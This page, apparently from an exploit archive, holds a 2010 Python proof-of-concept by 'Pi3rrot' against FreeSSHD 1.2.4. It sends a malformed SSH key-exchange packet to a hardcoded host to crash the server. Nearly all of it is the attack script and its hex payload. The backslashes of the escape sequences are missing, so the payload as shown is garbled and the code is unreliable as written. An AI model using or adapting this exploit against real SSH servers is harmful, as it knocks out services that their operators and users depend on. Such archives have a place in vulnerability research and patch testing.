FreeSSHD 1.2.4 Remote Buffer Overflow DoS

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : FreeSSHD 1.2.4 Remote Buffer Overflow DoS
# Published : 2010-03-22
# Author : Pi3rrot
# Previous Title : Donar Player 2.2.0 Local Crash PoC
# Next Title : no$gba 2.5c (.nds) local crash
#!/usr/bin/env python

"""
# Exploit Title: FreeSSHD 1.2.4 Remote Buffer Overflow DoS
# Date: 22-03-2010
# Author: Pi3rrot  -  tagazok [At] gmail [D0t] com         ak37@freenode
# Software Link: http://www.freesshd.com/
# Version: 1.2.4
# Tested on: Windows XP SP3 fr

# Explications :     This pof just may crash FreeSSHD 1.2.4 on ssh2 connexion.
            It use a malformed string on the SSH Key Exchange Init Corruption
            Exploit tested on Windows SP3 fr

            maybe it can be more exploited ?

Greets to the metasploit project & PV Eeckhoutte tutorials
"""

import sys
import socket

host = "192.168.0.14"
port = 22

print "********************************************************"
print "          FreeSSHD 1.2.4 Buffer Overflow DoS"
print "                     by Pi3rrot"
print "                  tagazok@gmail.com<mailto:tagazok@gmail.com>"
print "********************************************************"

banner = "SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1rn"

key = "x00x00x03x14x082xffxffx9fxdex5dx5fxb3x07x8fx49xa7x79x6ax03x3dxafx55x00x00x00x7ex64x69x66x66x69x65x2dx68x65x6cx6cx6dx61x6ex2dx67x72x6fx75x70x2dx65x78x63x68x61x6ex67x65x2dx73x68x61x32x35x36x2cx64x69x66x66x69x65x2dx68x65x6cx6cx6dx61x6ex2dx67x72x6fx75x70x2dx65x78x63x68x61x6ex67x65x2dx73x68x61x31x2cx64x69x66x66x69x65x2dx68x65x6cx6cx6dx61x6ex2dx67x72x6fx75x70x31x34x2dx73x68x61x31x2cx64x69x66x66x69x65x2dx68x65x6cx6cx6dx61x6ex2dx67x72x6fx75x70x31x2dx73x68x61x31x00x00x00x0fssh-rsa,ssh-dssx00x00x00x9dx61x65x73x31x32x38x2dx63x62x63x2cx33x64x65x73x2dx63x62x63x2cx62x6cx6fx77x66x69x73x68x2dx63x62x63x2cx63x61x73x74x31x32x38x2dx63x62x63x2cx61x72x63x66x6fx75x72x31x32x38x2cx61x72x63x66x6fx75x72x32x35x36x2cx61x72x63x66x6fx75x72x2cx61x65x73x31x39x32x2dx63x62x63x2cx61x65x73x32x35x36x2dx63x62x63x2cx72x69x6ax6ex64x61x65x6cx2dx63x62x63x40x6cx79x73x61x74x6fx72x2ex6cx69x75x2ex73x65x2cx61x65x73x31x32x38x2dx63x74x72x2cx61x65x73x31x39x32x2dx63x74x72x2cx61x65x73x32x35x36x2dx63x74x72x00x00x00x9dx61x65x73x31x32x38x2dx63x62x63x2cx33x64x65x73x2dx63x62x63x2cx62x6cx6fx77x66x69x73x68x2dx63x62x63x2cx63x61x73x74x31x32x38x2dx63x62x63x2cx61x72x63x66x6fx75x72x31x32x38x2cx61x72x63x66x6fx75x72x32x35x36x2cx61x72x63x66x6fx75x72x2cx61x65x73x31x39x32x2dx63x62x63x2cx61x65x73x32x35x36x2dx63x62x63x2cx72x69x6ax6ex64x61x65x6cx2dx63x62x63x40x6cx79x73x61x74x6fx72x2ex6cx69x75x2ex73x65x2cx61x65x73x31x32x38x2dx63x74x72x2cx61x65x73x31x39x32x2dx63x74x72x2cx61x65x73x32x35x36x2dx63x74x72x00x00x00x69x68x6dx61x63x2dx6dx64x35x2cx68x6dx61x63x2dx73x68x61x31x2cx75x6dx61x63x2dx36x34x40x6fx70x65x6ex73x73x68x2ex63x6fx6dx2cx68x6dx61x63x2dx72x69x70x65x6dx64x31x36x30x2cx68x6dx61x63x2dx72x69x70x65x6dx64x31x36x30x40x6fx70x65x6ex73x73x68x2ex63x6fx6dx2cx68x6dx61x63x2dx73x68x61x31x2dx39x36x2cx68x6dx61x63x2dx6dx64x35x2dx39x36x00x00x00x69x68x6dx61x63x2dx6dx64x35x2cx68x6dx61x63x2dx73x68x61x31x2cx75x6dx61x63x2dx36x34x40x6fx70x65x6ex73x73x68x2ex63x6fx6dx2cx68x6dx61x63x2dx72x69x70x65x6dx64x31x36x30x2cx68x6dx61x63x2dx72x69x70x65x6dx64x31x36x30x40x6fx70x65x6ex73x73x68x2ex63x6fx6dx2cx68x6dx61x63x2dx73x68x61x31x2dx39x36x2cx68x6dx61x63x2dx6dx64x35x2dx39x36x00x00x00x1ax7ax6cx69x62x40x6fx70x65x6ex73x73x68x2ex63x6fx6dx2cx7ax6cx69x62x2cx6ex6fx6ex65x00x00x00x1ax7ax6cx69x62x40x6fx70x65x6ex73x73x68x2ex63x6fx6dx2cx7ax6cx69x62x2cx6ex6fx6ex65x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"



buffer = banner + key

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((host, port))

print '[+] reponse du serveur : ' + sock.recv(1000)

sock.send(buffer)
print '[+] Buffer sent'



sock.close()